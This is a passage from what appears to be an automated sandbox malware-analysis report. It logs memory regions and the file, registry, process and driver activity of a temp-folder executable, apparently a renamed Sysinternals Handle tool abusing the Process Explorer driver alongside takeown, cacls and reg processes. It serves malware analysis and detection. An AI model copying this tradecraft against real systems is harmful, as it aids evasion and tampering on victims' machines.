| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f230000 | 0x7f230000 | 0x7f32ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f330000 | 0x7f330000 | 0x7f352fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f355000 | 0x7f355000 | 0x7f355fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f359000 | 0x7f359000 | 0x7f35bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f35c000 | 0x7f35c000 | 0x7f35efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f35f000 | 0x7f35f000 | 0x7f35ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #204: qry2vco264.exe
507
0
| Information | Value |
|---|---|
| ID | #204 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe |
| Command Line | qRY2vco2.exe -accepteula "blank.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:50, Reason: Self Terminated |
| Monitor Duration | 00:00:27 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8b0 |
| Parent PID | 0x9ec (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
580
0x
CB4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x00346fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x00350fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x005f0000 | 0x00623fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000006a0000 | 0x006a0000 | 0x006affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x01c3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01d45fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001db0000 | 0x01db0000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f934000 | 0x7f934000 | 0x7f934fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| qry2vco264.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffffa000 | 0x7ff5ffffa000 | 0x7ff5ffffbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffc000 | 0x7ff5ffffc000 | 0x7ff5ffffdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffe000 | 0x7ff5ffffe000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| version.dll | 0x7ffc4b890000 | 0x7ffc4b899fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffc4fd60000 | 0x7ffc4fe09fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffc54580000 | 0x7ffc54592fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffc545a0000 | 0x7ffc545e9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffc54610000 | 0x7ffc5461efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffc54670000 | 0x7ffc54c97fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffc54f80000 | 0x7ffc55032fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffc55040000 | 0x7ffc5521cfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffc55280000 | 0x7ffc552b5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffc552c0000 | 0x7ffc5535cfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffc55380000 | 0x7ffc554dbfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffc554e0000 | 0x7ffc5562dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffc55800000 | 0x7ffc558acfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffc559d0000 | 0x7ffc56ef4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffc56f10000 | 0x7ffc57094fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffc570a0000 | 0x7ffc571c5fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffc571d0000 | 0x7ffc5744bfff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffc57460000 | 0x7ffc57537fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffc57540000 | 0x7ffc5759afff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffc578a0000 | 0x7ffc578f0fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffc57aa0000 | 0x7ffc57b45fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (128)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\syswow64\takeown.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\backgroundtaskhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\commands-xerox-relationship.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\recorder.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\shift.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\unsubscribe-wisdom.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\shoe-associations.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\adobe\israeli-runtime-recommendation.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\les lodging.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows multimedia platform\normally.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows photo viewer\dir.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\baseball-showing-idaho.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\returned.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows nt\sweden_decorative_wit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\java\se-viii.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows multimedia platform\separate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\bulgaria.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows mail\advertisement-beginners.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\semiconductorphysfisheries.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\mozilla firefox\medicare.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\google\spain-chart.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\microsoft office\females-ward.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft.net\beast.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\msfeedssync.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\ciihmnxmn6ps\desktop\nwserbna.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\wscript.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiadap.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\consent.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\reg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\reg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dllhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (68)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc55800000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ffc57b50000 |
|
15 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\qry2vco264.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffc558202a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffc558223f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffc558163c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffc5581d920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffc55825620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffc55825580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffc558255e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffc55820e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffc5581f110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffc57b8cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffc57b95790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffc57b8ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffc558228c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffc57b8c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffc57b95410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffc57be42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffc57bc95e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffc57be3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffc55820fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffc55842720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffc550fe7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffc558428e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffc55816010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffc55842a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffc55820310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffc55842bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffc558225d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffc55842cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffc55816000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffc550945e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffc558165a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffc5581e960 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationProcess, address_out = 0x7ffc57be36d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryInformationThread, address_out = 0x7ffc57be3790 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x7ffc57be38a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySymbolicLinkObject, address_out = 0x7ffc57be4980 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryDirectoryObject, address_out = 0x7ffc57be47f0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenSymbolicLinkObject, address_out = 0x7ffc57be46c0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtOpenDirectoryObject, address_out = 0x7ffc57be3ac0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQueryObject, address_out = 0x7ffc57be3640 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = NtQuerySection, address_out = 0x7ffc57be3a50 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitAnsiString, address_out = 0x7ffc57bb5d30 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlInitUnicodeString, address_out = 0x7ffc57b6f0d0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlAnsiStringToUnicodeString, address_out = 0x7ffc57b736a0 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlFreeAnsiString, address_out = 0x7ffc57b77110 |
|
1 | |
| Get Address | c:\windows\system32\ntdll.dll | function = RtlUnicodeStringToAnsiString, address_out = 0x7ffc57b73dc0 |
|
1 |
Driver (243)
| Operation | Driver | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Control | \\.\PROCEXP152 | control_code = 0x83350048 |
|
157 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335004c |
|
4 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335003c |
|
6 | |
| Control | \\.\PROCEXP152 | control_code = 0x83350014 |
|
5 | |
| Control | \\.\PROCEXP152 | control_code = 0x8335000c |
|
71 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (16)
| Operation | Additional Information | Success | Count | Logfile |
